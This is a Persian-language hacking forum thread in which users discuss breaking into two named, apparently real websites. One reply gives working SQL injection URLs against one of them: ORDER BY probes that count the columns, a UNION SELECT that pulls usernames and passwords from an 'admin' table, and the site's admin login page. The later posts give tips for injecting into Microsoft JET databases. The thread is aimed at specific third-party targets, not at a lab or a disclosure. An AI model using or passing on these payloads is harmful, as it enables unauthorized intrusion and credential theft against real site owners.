SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

مشکل در نفوذ به تارگت

بستن
X
بستن
 
  • صفحه از 2
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی 1 2 template بعدی
  • #16
    RE: مشکل در نفوذ به تارگت

    سلام دوست من
    من همه اون ویدیو ها رو دیدم و کلی ویدیوی دیگه هم توی نت دیدم ولی هنوز برخی جاها به مشکل میخورم
    مثلا در تارگت های زیر: http://www.liaohe.net.cn/yule/katong/typen.asp?id=1+order+by+1--


    http://www.miracll.com/typen.asp?id=337+order+by+1-- 

    هر کاری کردم نتونستم بای پس کنم
    لطفا راهنمایی کنید
    توی برخی از انجمن های همسایه هم مطرح کردم ولی چیزی که بتونم یاد بگیرم ارائه نشد
     
    برای تغیر جامعه ابتدا می بایست از تغییر خودمان شروع کنیم.

    نظر

    • #17
      RE: مشکل در نفوذ به تارگت

      دقت نمیکنید ما توضیحاتو دادیم معلوم شد اصلا مطالعه نمیکنید .

      وقتی ستون وجود داشته باشه خطایی هم وجود نداره پس تا جایی تعداد ستون را بالا میرویم که به خطا برسیم که بدین معنی است که ستون وجود ندارد و ستون قبلی تعداد ستون دیتابیس است .

      کد:
      http://www.miracll.com/typen.asp?id=337+order+by+18
      تا اینجا خطا نداریم اما وقتی 19 ستون را بررسی میکنیم میبینیم که خطا نمایش داده میشود . پس 18 ستون داریم .

      کد:
      http://www.miracll.com/typen.asp?id=337+order+by+19
      در ضمن هدف Microsoft JET Database هست بنابراین ما در بیشتر موارد باید نام جدول هدف را حدس بزنیم یا بر اساس یک دیکشنری بررسی کنیم .

      این هم یوزر و پسورد

      کد:
      http://www.miracll.com/typen.asp?id=337+union+select+1,username,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,18+from+admin
      صفحه لاگین هم :

      کد:
      http://www.miracll.com/admin/Admin_Login.asp
      [align=center][/align]

      نظر

      • #18
        RE: مشکل در نفوذ به تارگت

        سلام دوست من
        ممنونم که با حوصله جواب میدین
        و مطمئن باشین که من هم مطالب رو با حوصله بیشتری میخونم چون واقعا میخوام یاد بگیرم
        اما با مقایسه دستوراتی که شما گذاشتین با دستورات order by  خودم محل اشکال رو پیدا کردم
        من همیشه این دستورات رو با کارکتر های    --   ایگنور می کنم اما در دستوری که شما گذاشتین این عمل انجام نشده
        و این دلیلی بود که صفحه حتی با عدد 1 هم لود نمیشد
        خب حالا سوالم اینه که آیا نباید این دستورات رو ایگنور کرد یا باید ایگنور کرد یا ایگنور کردن در برخی سرور ها جواب میده و در برخی دیگه جواب نمیده.
        برای تغیر جامعه ابتدا می بایست از تغییر خودمان شروع کنیم.

        نظر

        • #19
          RE: مشکل در نفوذ به تارگت

          این تارگت شما از پایگاه داده jet  استفاده میکند :
          در این حملات نباید از دش (-) استفاده کرد وبقیه کار مثل حملات mysql هست البته ورژن زیر 5   mysql
          البته متونید از جدول MSysAccessObjects برای شناسایی columns اسیب پذیر استفاده کرد
          موفق باشید

          نظر

          قبلی 1 2 template بعدی
          صبر کنید ..
          X